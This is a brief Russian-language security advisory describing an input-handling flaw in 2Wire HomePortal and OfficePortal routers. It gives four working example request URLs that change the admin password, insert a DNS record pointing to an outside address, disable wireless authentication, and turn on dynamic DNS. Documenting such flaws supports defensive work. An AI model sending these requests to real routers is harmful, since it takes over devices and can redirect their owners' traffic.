Программа:
2Wire HomePortal Series
2Wire OfficePortal Series
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
Установить пароль (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05& NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD= NUEVOPASS&PASSWORD_CONF=NUEVOPASS
Добавить имена в DNS (216.163.137.3 www.prueba.hkm):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME =www.prueba.hkm&ADDR=216.163.137.3
Откючить аутентификации при использовании беспроводной связи
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05& NEXTPAGE=C05_POST&NAME=encrypt_enabled &VALUE=0
Установить Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST& THISPAGE=J05&NEXTPAGE=J05_POST &IP_DYNAMIC=TRUE
